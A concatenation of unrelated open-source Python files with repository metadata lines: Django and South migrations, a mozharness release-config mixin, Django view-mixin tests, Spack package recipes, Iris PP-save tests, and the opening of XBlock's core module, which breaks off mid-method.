('image', models.ImageField(null=True, upload_to=zds.utils.models.image_path_category, blank=True)),
('slug', models.SlugField(max_length=80)),
],
options={
'verbose_name': 'Sous-categorie',
'verbose_name_plural': 'Sous-categories',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=20, verbose_name=b'Titre')),
('slug', models.SlugField(max_length=20)),
],
options={
'verbose_name': 'Tag',
'verbose_name_plural': 'Tags',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='categorysubcategory',
name='subcategory',
field=models.ForeignKey(verbose_name=b'Sous-Cat\xc3\xa9gorie', to='utils.SubCategory'),
preserve_default=True,
),
migrations.AddField(
model_name='alert',
name='comment',
field=models.ForeignKey(related_name='alerts', verbose_name=b'Commentaire', to='utils.Comment'),
preserve_default=True,
),
]
| DevHugo/zds-site | zds/utils/migrations/0001_initial.py | Python | gpl-3.0 | 8,591 |
#!/usr/bin/env python
# ***** BEGIN LICENSE BLOCK *****
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# ***** END LICENSE BLOCK *****
"""release.py
"""
import os
from mozharness.base.config import parse_config_file
# SignAndroid {{{1
class ReleaseMixin():
release_config = {}
def query_release_config(self):
if self.release_config:
return self.release_config
c = self.config
dirs = self.query_abs_dirs()
if c.get("release_config_file"):
self.info("Getting release config from %s..." % c["release_config_file"])
rc = None
try:
rc = parse_config_file(
os.path.join(dirs['abs_work_dir'],
c["release_config_file"]),
config_dict_name="releaseConfig"
)
except IOError:
self.fatal("Release config file %s not found!" % c["release_config_file"])
except RuntimeError:
self.fatal("Invalid release config file %s!" % c["release_config_file"])
self.release_config['version'] = rc['version']
self.release_config['buildnum'] = rc['buildNumber']
self.release_config['ftp_server'] = rc['stagingServer']
self.release_config['ftp_user'] = c.get('ftp_user', rc['hgUsername'])
self.release_config['ftp_ssh_key'] = c.get('ftp_ssh_key', rc['hgSshKey'])
else:
self.info("No release config file; using default config.")
for key in ('version', 'buildnum',
'ftp_server', 'ftp_user', 'ftp_ssh_key'):
self.release_config[key] = c[key]
self.info("Release config:\n%s" % self.release_config)
return self.release_config
| lissyx/build-mozharness | mozharness/mozilla/release.py | Python | mpl-2.0 | 1,945 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from django.core.exceptions import PermissionDenied
from mock import Mock, patch
from nose.tools import eq_, raises
from oneanddone.base.tests import TestCase
from oneanddone.users.mixins import BaseUserProfileRequiredMixin, MyStaffUserRequiredMixin
from oneanddone.users.tests import UserFactory, UserProfileFactory
class FakeMixin(object):
def dispatch(self, request, *args, **kwargs):
return 'fakemixin'
class FakeView(BaseUserProfileRequiredMixin, FakeMixin):
pass
class FakeViewNeedsStaff(MyStaffUserRequiredMixin, FakeMixin):
pass
class MyStaffUserRequiredMixinTests(TestCase):
def setUp(self):
self.view = FakeViewNeedsStaff()
def test_is_staff(self):
"""
If the user is staff, call the parent class's
dispatch method.
"""
request = Mock()
request.user = UserFactory.create(is_staff=True)
eq_(self.view.dispatch(request), 'fakemixin')
@raises(PermissionDenied)
def test_not_staff(self):
"""
If the user is not staff, raise a PermissionDenied exception.
"""
request = Mock()
request.user = UserFactory.create(is_staff=False)
self.view.dispatch(request)
class UserProfileRequiredMixinTests(TestCase):
def setUp(self):
self.view = FakeView()
def test_has_profile(self):
"""
If the user has created a profile, and has accepted privacy policy
call the parent class's dispatch method.
"""
request = Mock()
request.user = UserProfileFactory.create(privacy_policy_accepted=True).user
eq_(self.view.dispatch(request), 'fakemixin')
def test_no_profile(self):
"""
If the user hasn't created a profile, redirect them to the
profile creation view.
"""
request = Mock()
request.user = UserFactory.create()
with patch('oneanddone.users.mixins.redirect') as redirect:
eq_(self.view.dispatch(request), redirect.return_value)
redirect.assert_called_with('users.profile.create')
| bobsilverberg/oneanddone | oneanddone/users/tests/test_mixins.py | Python | mpl-2.0 | 2,289 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'SurveyUser.oneuser'
db.add_column('survey_surveyuser', 'oneuser', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'SurveyUser.oneuser'
db.delete_column('survey_surveyuser', 'oneuser_id')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'survey.extraresponse': {
'Meta': {'object_name': 'ExtraResponse'},
'data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participation': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['survey.Participation']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"})
},
'survey.lastresponse': {
'Meta': {'object_name': 'LastResponse'},
'data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participation': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['survey.Participation']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']", 'unique': 'True'})
},
'survey.localflusurvey': {
'Meta': {'object_name': 'LocalFluSurvey'},
'age_user': ('django.db.models.fields.SmallIntegerField', [], {}),
'data': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'surveyuser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"})
},
'survey.localprofile': {
'Meta': {'object_name': 'LocalProfile'},
'a_family': ('django.db.models.fields.SmallIntegerField', [], {}),
'a_smoker': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'a_vaccine_current': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'a_vaccine_prev_seasonal': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'a_vaccine_prev_swine': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'birth_date': ('django.db.models.fields.DateField', [], {}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'region': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'sq_date_first': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'sq_date_last': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'sq_num_season': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'sq_num_total': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'surveyuser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']", 'unique': 'True'}),
'zip_code': ('django.db.models.fields.CharField', [], {'max_length': '5'})
},
'survey.localresponse': {
'Meta': {'object_name': 'LocalResponse'},
'answers': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'survey.participation': {
'Meta': {'object_name': 'Participation'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'epidb_id': ('django.db.models.fields.CharField', [], {'max_length': '36', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'previous_participation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Participation']", 'null': 'True'}),
'previous_participation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'survey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Survey']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"})
},
'survey.profile': {
'Meta': {'object_name': 'Profile'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'survey': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['survey.Survey']", 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']", 'unique': 'True'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'survey.profilesendqueue': {
'Meta': {'object_name': 'ProfileSendQueue'},
'answers': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'survey.responsesendqueue': {
'Meta': {'object_name': 'ResponseSendQueue'},
'answers': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Participation']"}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'survey.survey': {
'Meta': {'object_name': 'Survey'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'specification': ('django.db.models.fields.TextField', [], {}),
'survey_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'survey.surveyuser': {
'Meta': {'object_name': 'SurveyUser'},
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'global_id': ('django.db.models.fields.CharField', [], {'default': "'c4b8d923-bf27-4a67-90d8-39550680036a'", 'unique': 'True', 'max_length': '36'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_participation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Participation']", 'null': 'True'}),
'last_participation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'oneuser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'temporary_name'", 'symmetrical': 'False', 'to': "orm['auth.User']"})
}
}
complete_apps = ['survey']
| sbfnk/epiwork-website | apps/survey/migrations/0006_auto__add_field_surveyuser_oneuser.py | Python | agpl-3.0 | 12,365 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PerlSubIdentify(PerlPackage):
"""Retrieve names of code references"""
homepage = "https://metacpan.org/pod/Sub::Identify"
url = "http://search.cpan.org/CPAN/authors/id/R/RG/RGARCIA/Sub-Identify-0.14.tar.gz"
version('0.14', sha256='068d272086514dd1e842b6a40b1bedbafee63900e5b08890ef6700039defad6f')
| LLNL/spack | var/spack/repos/builtin/packages/perl-sub-identify/package.py | Python | lgpl-2.1 | 547 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Openslide(AutotoolsPackage):
"""OpenSlide reads whole slide image files."""
homepage = "https://openslide.org/"
url = "https://github.com/openslide/openslide/releases/download/v3.4.1/openslide-3.4.1.tar.xz"
version('3.4.1', sha256='9938034dba7f48fadc90a2cdf8cfe94c5613b04098d1348a5ff19da95b990564')
depends_on('pkgconfig', type='build')
depends_on('openjpeg')
depends_on('jpeg')
depends_on('libtiff')
depends_on('libxml2')
depends_on('sqlite@3.6:')
depends_on('glib')
depends_on('cairo+pdf')
depends_on('gdk-pixbuf')
| LLNL/spack | var/spack/repos/builtin/packages/openslide/package.py | Python | lgpl-2.1 | 803 |
# (C) British Crown Copyright 2010 - 2017, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
import six
# import iris tests first so that some things can be initialised before importing anything else
import iris.tests as tests
import os
import tempfile
import cf_units
import numpy as np
import iris.coords
import iris.coord_systems
import iris.fileformats.pp
from iris.fileformats.pp import PPField3
from iris.tests import mock
import iris.tests.pp as pp
import iris.util
import iris.tests.stock as stock
def itab_callback(cube, field, filename):
cube.add_aux_coord(iris.coords.AuxCoord([field.lbrel], long_name='MOUMHeaderReleaseNumber', units='no_unit'))
cube.add_aux_coord(iris.coords.AuxCoord([field.lbexp], long_name='ExperimentNumber(ITAB)', units='no_unit'))
@tests.skip_data
class TestPPSave(tests.IrisTest, pp.PPTest):
def test_no_forecast_time(self):
cube = stock.lat_lon_cube()
coord = iris.coords.DimCoord(np.array([24], dtype=np.int64),
standard_name='time',
units='hours since epoch')
cube.add_aux_coord(coord)
self.assertCML(cube, ['cube_to_pp', 'no_forecast_time.cml'])
reference_txt_path = tests.get_result_path(('cube_to_pp', 'no_forecast_time.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cube) as temp_pp_path:
iris.save(cube, temp_pp_path)
def test_no_forecast_period(self):
cube = stock.lat_lon_cube()
# Add a bounded scalar time coord and a forecast_reference_time.
time_coord = iris.coords.DimCoord(
10.958333, standard_name='time',
units='days since 2013-05-10 12:00',
bounds=[10.916667, 11.0])
cube.add_aux_coord(time_coord)
forecast_reference_time = iris.coords.DimCoord(
2.0, standard_name='forecast_reference_time',
units='weeks since 2013-05-07')
cube.add_aux_coord(forecast_reference_time)
self.assertCML(cube, ['cube_to_pp', 'no_forecast_period.cml'])
reference_txt_path = tests.get_result_path(('cube_to_pp',
'no_forecast_period.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cube) as \
temp_pp_path:
iris.save(cube, temp_pp_path)
def test_pp_save_rules(self):
# Test pp save rules without user rules.
#read
in_filename = tests.get_data_path(('PP', 'simple_pp', 'global.pp'))
cubes = iris.load(in_filename, callback=itab_callback)
reference_txt_path = tests.get_result_path(('cube_to_pp', 'simple.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cubes) as temp_pp_path:
iris.save(cubes, temp_pp_path)
def test_pp_append_singles(self):
# Test pp append saving - single cubes.
# load 2 arrays of >2D cubes
cube = stock.simple_pp()
reference_txt_path = tests.get_result_path(('cube_to_pp', 'append_single.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=[cube, cube]) as temp_pp_path:
iris.save(cube, temp_pp_path) # Create file
iris.save(cube, temp_pp_path, append=True) # Append to file
reference_txt_path = tests.get_result_path(('cube_to_pp', 'replace_single.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cube) as temp_pp_path:
iris.save(cube, temp_pp_path) # Create file
iris.save(cube, temp_pp_path) # Replace file
def test_pp_append_lists(self):
# Test PP append saving - lists of cubes.
# For each of the first four time-steps in the 4D cube,
# pull out the bottom two levels.
cube_4d = stock.realistic_4d()
cubes = [cube_4d[i, :2, :, :] for i in range(4)]
reference_txt_path = tests.get_result_path(('cube_to_pp', 'append_multi.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cubes) as temp_pp_path:
iris.save(cubes[:2], temp_pp_path)
iris.save(cubes[2:], temp_pp_path, append=True)
reference_txt_path = tests.get_result_path(('cube_to_pp', 'replace_multi.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cubes[2:]) as temp_pp_path:
iris.save(cubes[:2], temp_pp_path)
iris.save(cubes[2:], temp_pp_path)
def add_coords_to_cube_and_test(self, coord1, coord2):
# a wrapper for creating arbitrary 2d cross-sections and run pp-saving tests
dataarray = np.arange(16, dtype='>f4').reshape(4, 4)
cm = iris.cube.Cube(data=dataarray)
cm.add_dim_coord(coord1, 0)
cm.add_dim_coord(coord2, 1)
# TODO: This is the desired line of code...
# reference_txt_path = tests.get_result_path(('cube_to_pp', '%s.%s.pp.txt' % (coord1.name(), coord2.name())))
# ...but this is required during the CF change, to maintain the original filename.
coord1_name = coord1.name().replace("air_", "")
coord2_name = coord2.name().replace("air_", "")
reference_txt_path = tests.get_result_path(('cube_to_pp', '%s.%s.pp.txt' % (coord1_name, coord2_name)))
# test with name
with self.cube_save_test(reference_txt_path, reference_cubes=cm,
field_coords=[coord1.name(), coord2.name()]) as temp_pp_path:
iris.save(cm, temp_pp_path, field_coords=[coord1.name(), coord2.name()])
# test with coord
with self.cube_save_test(reference_txt_path, reference_cubes=cm,
field_coords=[coord1, coord2]) as temp_pp_path:
iris.save(cm, temp_pp_path, field_coords=[coord1, coord2])
def test_non_standard_cross_sections(self):
#ticket #1037, the five variants being dealt with are
# 'pressure.latitude',
# 'depth.latitude',
# 'eta.latitude',
# 'pressure.time',
# 'depth.time',
f = FakePPEnvironment()
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, long_name='air_pressure', units='hPa', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='latitude', units='degrees', bounds=f.y_bounds, coord_system=f.geog_cs()))
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, long_name='depth', units='m', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='latitude', units='degrees', bounds=f.y_bounds, coord_system=f.geog_cs()))
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, long_name='eta', units='1', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='latitude', units='degrees', bounds=f.y_bounds, coord_system=f.geog_cs()))
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, long_name='air_pressure', units='hPa', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='time', units=cf_units.Unit('days since 0000-01-01 00:00:00', calendar=cf_units.CALENDAR_360_DAY), bounds=f.y_bounds))
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, standard_name='depth', units='m', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='time', units=cf_units.Unit('days since 0000-01-01 00:00:00', calendar=cf_units.CALENDAR_360_DAY), bounds=f.y_bounds))
def test_365_calendar_export(self):
# test for 365 day calendar export
cube = stock.simple_pp()
new_unit = cf_units.Unit('hours since 1970-01-01 00:00:00',
calendar=cf_units.CALENDAR_365_DAY)
cube.coord('time').units = new_unit
# Add an extra "fill_value" property, as used by the save rules.
cube.fill_value = None
pp_field = mock.MagicMock(spec=PPField3)
iris.fileformats.pp_save_rules.verify(cube, pp_field)
self.assertEqual(pp_field.lbtim.ic, 4)
class FakePPEnvironment(object):
''' fake a minimal PP environment for use in cross-section coords, as in PP save rules '''
y = [1, 2, 3, 4]
z = [111, 222, 333, 444]
y_bounds = [[0.9, 1.1], [1.9, 2.1], [2.9, 3.1], [3.9, 4.1]]
z_bounds = [[110.9, 111.1], [221.9, 222.1], [332.9, 333.1], [443.9, 444.1]]
def geog_cs(self):
"""Return a GeogCS for this PPField.
Returns:
A GeogCS with the appropriate earth shape, meridian and pole position.
"""
return iris.coord_systems.GeogCS(6371229.0)
class TestPPSaveRules(tests.IrisTest, pp.PPTest):
def test_default_coord_system(self):
GeogCS = iris.coord_systems.GeogCS
cube = iris.tests.stock.lat_lon_cube()
reference_txt_path = tests.get_result_path(('cube_to_pp',
'default_coord_system.txt'))
# Remove all coordinate systems.
for coord in cube.coords():
coord.coord_system = None
# Ensure no coordinate systems available.
self.assertIsNone(cube.coord_system(GeogCS))
self.assertIsNone(cube.coord_system(None))
with self.cube_save_test(reference_txt_path, reference_cubes=cube) as \
temp_pp_path:
# Save cube to PP with no coordinate system.
iris.save(cube, temp_pp_path)
pp_cube = iris.load_cube(temp_pp_path)
# Ensure saved cube has the default coordinate system.
self.assertIsInstance(pp_cube.coord_system(GeogCS),
iris.coord_systems.GeogCS)
self.assertIsNotNone(pp_cube.coord_system(None))
self.assertIsInstance(pp_cube.coord_system(None),
iris.coord_systems.GeogCS)
self.assertIsNotNone(pp_cube.coord_system())
self.assertIsInstance(pp_cube.coord_system(),
iris.coord_systems.GeogCS)
def lbproc_from_pp(self, filename):
# Gets the lbproc field from the ppfile
pp_file = iris.fileformats.pp.load(filename)
field = next(pp_file)
return field.lbproc
def test_pp_save_rules(self):
# Test single process flags
for _, process_desc in iris.fileformats.pp.LBPROC_PAIRS[1:]:
# Get basic cube and set process flag manually
ll_cube = stock.lat_lon_cube()
ll_cube.attributes["ukmo__process_flags"] = (process_desc,)
# Save cube to pp
temp_filename = iris.util.create_temp_filename(".pp")
iris.save(ll_cube, temp_filename)
# Check the lbproc is what we expect
self.assertEqual(self.lbproc_from_pp(temp_filename),
iris.fileformats.pp.lbproc_map[process_desc])
os.remove(temp_filename)
# Test mutiple process flags
multiple_bit_values = ((128, 64), (4096, 1024), (8192, 1024))
# Maps lbproc value to the process flags that should be created
multiple_map = {sum(bits) : [iris.fileformats.pp.lbproc_map[bit] for bit in bits] for bits in multiple_bit_values}
for lbproc, descriptions in six.iteritems(multiple_map):
ll_cube = stock.lat_lon_cube()
ll_cube.attributes["ukmo__process_flags"] = descriptions
# Save cube to pp
temp_filename = iris.util.create_temp_filename(".pp")
iris.save(ll_cube, temp_filename)
# Check the lbproc is what we expect
self.assertEqual(self.lbproc_from_pp(temp_filename), lbproc)
os.remove(temp_filename)
@tests.skip_data
def test_lbvc(self):
cube = stock.realistic_4d_no_derived()[0, :4, ...]
v_coord = iris.coords.DimCoord(standard_name='depth',
units='m', points=[-5, -10, -15, -20])
cube.remove_coord('level_height')
cube.remove_coord('sigma')
cube.remove_coord('surface_altitude')
cube.add_aux_coord(v_coord, 0)
expected = ([2, 1, -5.0],
[2, 2, -10.0],
[2, 3, -15.0],
[2, 4, -20.0])
for field, (lbvc, lblev, blev) in zip(fields_from_cube(cube), expected):
self.assertEqual(field.lbvc, lbvc)
self.assertEqual(field.lblev, lblev)
self.assertEqual(field.blev, blev)
def fields_from_cube(cubes):
"""
Return an iterator of PP fields generated from saving the given cube(s)
to a temporary file, and then subsequently loading them again
"""
with tempfile.NamedTemporaryFile('w+b', suffix='.pp') as tmp_file:
if six.PY2:
fh = tmp_file.file
else:
fh = tmp_file
iris.save(cubes, fh, saver='pp')
# make sure the fh is written to disk, and move it back to the
# start of the file
fh.flush()
os.fsync(fh)
fh.seek(0)
# load in the saved pp fields and check the appropriate metadata
for field in iris.fileformats.pp.load(tmp_file.name):
yield field
if __name__ == "__main__":
tests.main()
| LukeC92/iris | lib/iris/tests/test_cube_to_pp.py | Python | lgpl-3.0 | 14,217 |
"""
Core classes for the XBlock family.
This code is in the Runtime layer, because it is authored once by edX
and used by all runtimes.
"""
import inspect
import pkg_resources
import warnings
from collections import defaultdict
from xblock.exceptions import DisallowedFileError
from xblock.fields import String, List, Scope
from xblock.internal import class_lazy
import xblock.mixins
from xblock.mixins import (
ScopedStorageMixin,
HierarchyMixin,
RuntimeServicesMixin,
HandlersMixin,
XmlSerializationMixin,
IndexInfoMixin,
ViewsMixin,
)
from xblock.plugin import Plugin
from xblock.validation import Validation
# exposing XML_NAMESPACES as a member of core, in order to avoid importing mixins where
# XML_NAMESPACES are needed (e.g. runtime.py).
XML_NAMESPACES = xblock.mixins.XML_NAMESPACES
# __all__ controls what classes end up in the docs.
__all__ = ['XBlock']
UNSET = object()
class XBlockMixin(ScopedStorageMixin):
"""
Base class for XBlock Mixin classes.
XBlockMixin classes can add new fields and new properties to all XBlocks
created by a particular runtime.
"""
pass
class SharedBlockBase(Plugin):
"""
Behaviors and attrs which all XBlock like things should share
"""
@classmethod
def open_local_resource(cls, uri):
"""Open a local resource.
The container calls this method when it receives a request for a
resource on a URL which was generated by Runtime.local_resource_url().
It will pass the URI from the original call to local_resource_url()
back to this method. The XBlock must parse this URI and return an open
file-like object for the resource.
For security reasons, the default implementation will return only a
very restricted set of file types, which must be located in a folder
called "public". XBlock authors who want to override this behavior will
need to take care to ensure that the method only serves legitimate
public resources. At the least, the URI should be matched against a
whitelist regex to ensure that you do not serve an unauthorized
resource.
"""
# Verify the URI is in whitelisted form before opening for serving.
# URI must begin with public/, and no file path component can start
# with a dot, which prevents ".." and ".hidden" files.
if not uri.startswith("public/"):
raise DisallowedFileError("Only files from public/ are allowed: %r" % uri)
if "/." in uri:
raise DisallowedFileError("Only safe file names are allowed: %r" % uri)
return pkg_resources.resource_stream(cls.__module__, uri)
# -- Base Block
class XBlock(XmlSerializationMixin, HierarchyMixin, ScopedStorageMixin, RuntimeServicesMixin, HandlersMixin,
IndexInfoMixin, ViewsMixin, SharedBlockBase):
"""Base class for XBlocks.
Derive from this class to create a new kind of XBlock. There are no
required methods, but you will probably need at least one view.
Don't provide the ``__init__`` method when deriving from this class.
"""
entry_point = 'xblock.v1'
name = String(help="Short name for the block", scope=Scope.settings)
tags = List(help="Tags for this block", scope=Scope.settings)
@class_lazy
def _class_tags(cls): # pylint: disable=no-self-argument
"""
Collect the tags from all base classes.
"""
class_tags = set()
for base in cls.mro()[1:]: # pylint: disable=no-member
class_tags.update(getattr(base, '_class_tags', set()))
return class_tags
@staticmethod
def tag(tags):
"""Returns a function that adds the words in `tags` as class tags to this class."""
def dec(cls):
"""Add the words in `tags` as class tags to this class."""
# Add in this class's tags
cls._class_tags.update(tags.replace(",", " ").split()) # pylint: disable=protected-access
return cls
return dec
@classmethod
def load_tagged_classes(cls, tag, fail_silently=True):
"""
Produce a sequence of all XBlock classes tagged with `tag`.
fail_silently causes the code to simply log warnings if a
plugin cannot import. The goal is to be able to use part of
libraries from an XBlock (and thus have it installed), even if
the overall XBlock cannot be used (e.g. depends on Django in a
non-Django application). There is diagreement about whether
this is a good idea, or whether we should see failures early
(e.g. on startup or first page load), and in what
contexts. Hence, the flag.
"""
# Allow this method to access the `_class_tags`
# pylint: disable=W0212
